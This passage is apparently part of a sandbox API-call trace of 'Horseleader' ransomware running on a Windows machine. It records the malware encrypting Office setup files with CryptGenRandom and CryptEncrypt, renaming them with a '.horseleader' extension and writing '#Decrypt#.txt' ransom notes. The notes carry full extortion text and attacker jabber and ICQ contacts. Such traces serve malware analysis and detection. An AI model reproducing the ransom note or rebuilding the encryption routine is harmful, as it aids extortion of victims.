nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x32b, lpOverlapped=0x0) returned 1 [0244.835] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.836] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.836] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 
[0244.836] CloseHandle (hObject=0x15c) returned 1 [0244.836] GetProcessHeap () returned 0x780000 [0244.836] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.836] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.horseleader") returned 123 [0244.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.horseleader")) returned 1 [0244.837] GetProcessHeap () returned 0x780000 [0244.837] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.837] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58c6830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.837] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.837] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") 
returned 108 [0244.837] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.837] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.837] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.838] lstrlenW (lpString=".testttjffg") returned 11 [0244.838] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.838] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.838] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.838] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 108 [0244.838] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.838] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=5884) returned 1 [0244.839] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x16fc, lpOverlapped=0x0) returned 1 [0244.841] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe904, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0244.841] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x16fc, lpOverlapped=0x0) returned 1 [0244.841] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.841] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.842] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.842] CloseHandle (hObject=0x15c) returned 1 [0244.842] GetProcessHeap () returned 0x780000 [0244.842] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.842] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.horseleader") returned 120 [0244.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml.horseleader")) returned 1 [0244.843] GetProcessHeap () returned 0x780000 [0244.843] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | 
out: hHeap=0x780000) returned 1 [0244.843] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58c6830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.843] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.843] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\#Decrypt#.txt") returned 112 [0244.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.846] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.846] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.847] lstrlenA (lpString="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") returned 1368 [0244.847] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.847] CloseHandle (hObject=0x1a4) returned 1 [0244.847] GetProcessHeap () returned 0x780000 [0244.847] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.847] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="PROPLUSR", cAlternateFileName="")) returned 1 [0244.847] lstrcmpiW (lpString1="PROPLUSR", lpString2="Windows") returned -1 [0244.847] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR") returned 92 [0244.847] lstrcmpW (lpString1="PROPLUSR", lpString2=".") returned 1 [0244.847] lstrcmpW (lpString1="PROPLUSR", lpString2="..") returned 1 [0244.848] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.848] GetProcessHeap () 
returned 0x780000 [0244.848] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.848] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*") returned 94 [0244.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.855] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.855] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\.") returned 94 [0244.855] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.855] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.855] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.855] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\..") returned 95 [0244.855] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.855] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.855] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x170fe40, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="ProPlusrWW.XML", cAlternateFileName="PROPLU~1.XML")) returned 1 [0244.855] lstrcmpiW (lpString1="ProPlusrWW.XML", lpString2="Windows") returned -1 [0244.855] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 107 [0244.855] StrStrIW (lpFirst="ProPlusrWW.XML", lpSrch=".horseleader") returned 0x0 [0244.856] lstrcmpW (lpString1="ProPlusrWW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.856] lstrcmpW (lpString1="ProPlusrWW.XML", lpString2="_uninstalling_.png") returned 1 [0244.856] lstrlenW (lpString=".testttjffg") returned 11 [0244.856] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML", lpSrch=".testttjffg") returned 0x0 [0244.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.856] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office 
Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.857] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 107 [0244.857] StrStrW (lpFirst="ProPlusrWW.XML", lpSrch=".txt") returned 0x0 [0244.857] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=16852) returned 1 [0244.857] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x41d4, lpOverlapped=0x0) returned 1 [0244.860] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.860] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x41d4, lpOverlapped=0x0) returned 1 [0244.860] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.860] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.860] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.861] CloseHandle (hObject=0x15c) returned 1 [0244.861] 
GetProcessHeap () returned 0x780000 [0244.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.861] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.horseleader") returned 119 [0244.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.horseleader")) returned 1 [0244.862] GetProcessHeap () returned 0x780000 [0244.862] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.862] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18177c50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.862] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.862] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 102 [0244.862] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 
[0244.863] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.863] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.863] lstrlenW (lpString=".testttjffg") returned 11 [0244.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML") returned 102 [0244.863] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.864] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=31094) returned 1 [0244.864] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.869] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.869] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.870] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2976, lpOverlapped=0x0) returned 1 [0244.872] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.872] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2976, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2976, lpOverlapped=0x0) returned 1 [0244.872] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.872] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.873] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.873] CloseHandle (hObject=0x15c) returned 1 [0244.873] GetProcessHeap () returned 0x780000 [0244.873] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.873] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.horseleader") returned 114 [0244.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: 
"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml.horseleader")) returned 1 [0244.874] GetProcessHeap () returned 0x780000 [0244.874] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.874] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18177c50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.874] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.874] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\#Decrypt#.txt") returned 106 [0244.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.877] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client 
